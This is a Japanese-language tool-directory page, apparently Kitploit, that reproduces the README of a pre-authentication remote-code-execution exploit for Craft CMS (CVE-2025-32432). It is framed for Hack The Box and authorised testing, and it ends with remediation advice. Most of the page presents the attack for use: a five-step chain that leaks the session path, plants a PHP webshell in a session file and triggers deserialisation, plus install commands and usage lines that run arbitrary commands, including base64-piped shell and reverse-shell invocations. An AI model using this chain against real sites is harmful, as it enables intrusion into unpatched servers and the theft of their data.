Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32432-exploit-by-P34NUT — Craft CMS 3.x/4.x/5.x 向けの信頼性の高い CVE-2025-32432 認証前 RCE エクスプロイト。他の公開 PoC が失敗する環境でも動作します | Kitploit
ツール/GitHubGitHub/p34nut2/cve-2025-32432-exploit-by-p34nut
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubp34nut2/cve-2025-32432-exploit-by-p34nut

CVE-2025-32432-exploit-by-P34NUT

Craft CMS 3.x/4.x/5.x 向けの信頼性の高い CVE-2025-32432 認証前 RCE エクスプロイト。他の公開 PoC が失敗する環境でも動作します

リポジトリを見る
214時間54分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32432 — Craft CMS 認証前 RCE エクスプロイト

作者: P34NUT2
脆弱性: Craft CMS におけるリモートコード実行 (認証前)
CVE: CVE-2025-32432
対象: 脆弱な Craft CMS インスタンス (3.x / 4.x / 5.x) — Hack The Box: Orion で検証済み


⚠️ 免責事項

このツールは、Hack The Box、TryHackMe、またはあなたが所有するか、テストに対する明示的な書面による許可を得ているプライベートラボ環境など、教育目的および許可されたペネトレーションテストに厳密に限定して提供されています。

あなたが所有していない、またはテストに対する明示的な許可を得ていないシステムに対してこのツールを不正使用することは、Computer Fraud and Abuse Act (CFAA)、情報システムに対する攻撃に関する EU 指令、および世界中のほとんどの法域における同等の法律の下で違法です。

作者は、このソフトウェアの使用に起因するいかなる誤用、損害、または法的結果についても、一切の責任を負いません。責任を持って倫理的に使用してください。


💡 動機と背景

CVE-2025-32432 の公開 PoC のほとんどは、HTB: Orion のような実環境のターゲットに対して、以下の理由で失敗します:

  • URL パラメータのエンコードが不適切
  • 特殊文字 (&、>、<) の処理が壊れている
  • PHP セッションポイズニング段階でのセッションファイルの切り捨て

このエクスプロイトは、これらの信頼性の問題を解決するためにゼロから構築されました。URL エンコードを適切に処理し、動的トークン抽出を自動化し、Base64 ラッパーパイプラインを使用して、あらゆる脆弱な Craft CMS インスタンスに対して信頼性の高い実行を実現します — 実際のデプロイメントに対して検証され、HTB Orion で実証されています。


🔗 技術的エクスプロイトチェーン

ステップアクション説明
1セッションと CSRF の取得管理エンドポイントから CraftSessionId、CRAFT_CSRF_TOKEN、および動的な CSRF_TOKEN を抽出します
2アセット ID の探索トランスフォーム生成ペイロードに必要な有効なアセット ID をブルートフォースします
3セッションパスの漏洩Guzzle オブジェクトを注入して phpinfo() をトリガーし、session.save_path を動的に読み取ります
4セッションポイズニングURL エンコードされた PHP ウェブシェルペイロードをアクティブなセッションファイルに注入します
5RCE トリガーポイズニングされたセッションをデシリアライズして、任意のシステムコマンドを実行します

📦 インストール

root@kitploit:~
git clone https://github.com/P34NUT2/CVE-2025-32432-exploit-by-P34NUT2.git
cd CVE-2025-32432-exploit-by-P34NUT2
pip install -r requirements.txt

🚀 使用方法

引数

フラグロングオプション必須説明
-u--url✅ はいターゲットのベース URL (例: http://example.com)
-c--cmd✅ はいリモートターゲットで実行するコマンド
-a--asset❌ いいえ既知の有効なアセット ID (実行を高速化します)
-s--scan-max❌ いいえアセット ID ブルートフォースの最大範囲 (デフォルト: 300)

例

1. 基本的なコマンド実行

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://example.com -c "whoami"

2. 既知のアセット ID を使用する場合 (高速)

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://example.com -a 1 -c "id"

3. エンコードされたペイロード (特殊文字に推奨)

特殊文字が HTTP パーサーによって変更されたり、セッション処理中に切り捨てられたりするのを防ぐため、コマンドを渡す前に Base64 でエンコードしてください:

root@kitploit:~
# Step 1 — encode your command locally
echo -n "YOUR_COMMAND_HERE" | base64

# Step 2 — pass the encoded string through the script
python3 craftcms_rce_exploit_php.py -u http://example.com -c "echo <BASE64_STRING> | base64 -d | sh"

4. Base64 ラッパー経由のリバースシェル

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://target.htb -c "echo <B64_PAYLOAD> | base64 -d | bash"

🛡️ 修復

Craft CMS を運用しているシステム管理者または開発者の方は、以下の緩和策を適用してください:

  • Craft CMS を更新する — 最新のパッチ済みリリース (≥ 5.6.17 / ≥ 4.14.14) へ。
  • アクセスを制限する — ファイアウォールルールまたはミドルウェアを介して、管理アクションエンドポイント (/actions/*) へのアクセスを制限します。
  • PHP セッションディレクトリを強化する — 信頼できない Web プロセスから書き込み可能でないことを確認します。
  • 異常なデシリアライズ活動を監視する — アプリケーションログおよび Web サーバーログを監視します。

📄 ライセンス

このプロジェクトは、教育目的および許可されたテストでの使用に限定してライセンスされています。詳細は LICENSE を参照してください。

ツールをダウンロード